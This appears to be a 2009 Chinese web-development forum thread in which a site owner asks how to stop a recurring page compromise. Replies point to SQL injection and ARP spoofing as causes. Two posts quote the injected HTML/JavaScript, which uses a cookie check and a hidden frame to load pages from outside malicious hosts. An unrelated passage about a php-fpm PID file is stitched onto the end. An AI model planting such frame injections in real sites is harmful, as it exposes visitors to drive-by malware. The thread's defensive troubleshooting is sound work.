网站被挂马怎么办啊!急

129find 2009-07-04 03:24:27
尝试操作如下未果:
1。用麦咖啡及360扫描服务器全盘文件,并未发现任何病毒及木马程序。
2。格式化服务器硬盘并,重新安装程序。(失败,格式化,重新安装完后照样被挂马)
3。怀疑窃取服务器端密码。(失败,服务器端日志正常,密码安全措施严密)
4。怀疑入侵数据库。(怀疑中,目前只要刷新数据库网页能恢复正常,但经过多次数据库刷新和重新启动数据库及数据服务后,有时并不能恢复正常。)

现把木马页面源代码公布如下
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://ip8ip.3322.org/aa/a2.htm?1";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/user/vote/uservote.jsp?UpdatedPage=aGlqYWNr">
<frame name="hi" src="">
</frameset>
</html>

src="/user/vote/uservote.jsp?UpdatedPage=aGlqYWNr"多出了参数UpdatedPage=aGlqYWNr和函数showme()

望牛人帮忙解决哈~!~!~!
...全文
2122 24 打赏 收藏 转发到动态 举报
写回复
用AI写文章
24 条回复
切换为时间正序
请发表友善的回复…
发表回复
wy811007 2011-01-10
  • 打赏
  • 举报
回复
如何 解决sql注入啊
fz04003 2010-06-02
  • 打赏
  • 举报
回复
今天遇到一样的问题,最终发现不是程序问题,是机房内部ARP挂马攻击
解决方案如下:
在服务器安装360,启动木马防火墙中的ARP防火墙
1、手工绑定机房的服务器网关IP地址与MAC地址
2、ARP主动防御方式:始终启用,防御速度6个/秒----这个是极为怪异的,自动防御竟然是无效的说,真是好搞笑
一般这样就好了,不行就是缓存,重启,过几分钟就好
dreamshadow 2009-10-20
  • 打赏
  • 举报
回复
这是一种ARP病毒的症状,通常中毒页面的代码会变成以下内容:
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://g.isa8c.cn/d5/x4/index.htm?03";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="INJECT_PAGE_URL">
<frame name="hi" src="">
</frameset>
</html>
如果你的页面有类似代码,可以肯定的是你的局域网内有机器中了ARP木马,解决此问题的方法:
网关静态绑定你的服务器的MAC地址!
129find 2009-07-24
  • 打赏
  • 举报
回复
已经解决,解决sql注入问题就ok了
ofacop 2009-07-13
  • 打赏
  • 举报
回复
lz,解决没?
SK猫 2009-07-08
  • 打赏
  • 举报
回复
SQL防注入,网上有些通用版的防注入,include到连接数据库那个文件就可以了
129find 2009-07-08
  • 打赏
  • 举报
回复
[Quote=引用 10 楼 kadach11 的回复:]
你的请求ADDRESS 太过明显,试试用URLREWRITE 把地址修饰下。另推荐定义个权限过滤器。
[/Quote]
如何使用URLREWRITE 进行地址修饰?
还有如何判断传的参数是否包含sql关键字?
希望能指点一二
APOLLO_TS 2009-07-07
  • 打赏
  • 举报
回复
手头没点东西干找可就费劲了!!

-------------------------------
你要是有追踪器什么的就可以马马虎虎的用用。先给你个费劲的手动方法:
--------------------------------------------
首先你要把服务器操作系统告诉大家吧!!

scan 端口。一个一个的关掉,刷新网页。

如果刷到2022---网页不在有新情况就要确定2022是什么程序了!
------------------------------------------------------------------------

sheng90hou 2009-07-07
  • 打赏
  • 举报
回复
帮你顶顶.
等高ren
zl3450341 2009-07-07
  • 打赏
  • 举报
回复
帮顶
bolink5 2009-07-07
  • 打赏
  • 举报
回复
友情帮顶啊
期待牛人
kadach11 2009-07-07
  • 打赏
  • 举报
回复
你的请求ADDRESS 太过明显,试试用URLREWRITE 把地址修饰下。另推荐定义个权限过滤器。
Sunny_kaka 2009-07-07
  • 打赏
  • 举报
回复
帮你顶顶.
等高手来
wood_001 2009-07-07
  • 打赏
  • 举报
回复
不要给它喂草 饿死它 ×× 玩笑话
cheng8078 2009-07-07
  • 打赏
  • 举报
回复
试一下换一下网站的IP看看,或者让托管机房的管理员检查一下机房的情况
Defonds 2009-07-04
  • 打赏
  • 举报
回复
mark
chenhao_283 2009-07-04
  • 打赏
  • 举报
回复
站在这里等牛人;解
jiaqiangzhou 2009-07-04
  • 打赏
  • 举报
回复
把代码删了不行吗?
周一又是新的开始!所有事情都按照往常的节奏按部就班,有条不紊的进行着。首先是检查下各网站及应用系统是否正常,然后看看日志信息是否也有异样,一圈下来结果跟以前差一样没有其它问题。   今天唯独没有像往一样,上线之后并没打开系统监控(平时都是用SecureCRT登录系统之后,打开TOP命令让它一直在线,偶尔看下)。到了早上10点多快11点的时候,随手又点击了一下网站,这下出现的画面让我为之一醒(不是一惊)   所 实话这个介面还真不多见,但跟这个相似的就是前后端连接超时也会出现一个提示页面,但内容不太一样。这下我就了,难道被人黑了?因为最近老有朋友说他的 网站了,所以我一个冲上来的念头就是被人黑了。连忙SSH登录后台看看,最后的登录IP也是自己的,这才稍有点放心,是自己紧张过头了。   稍作冷静之后,再结合提示页面的信息,应该是系统服务出了问题而非被入侵造成。于是就从检查日志、进程、端口等方面着手展开排查,很快就在php-fpm.log日志文件有所发现   突然似乎想到了什 么,要检查下PID文件,因为在Linux下记录某个进程是否运行是通过生成一个对应的PID文件,写入当前的进程号作标识的。真是喜出望外呀~这个 pid文件是空的,虽然有这个名称的文件,但里边没有内容。所以就解释了为什么启动服务就说已经运行,停止它的时候说失败了。几经检查,发现用来启动 php-fpm的脚本写得不严密,只是在启动的时候检查是否有pid文件存在而不管它是否有真实的PID内容,才造成了启动、停止都不正常。

81,092

社区成员

发帖
与我相关
我的任务
社区描述
Java Web 开发
社区管理员
  • Web 开发社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧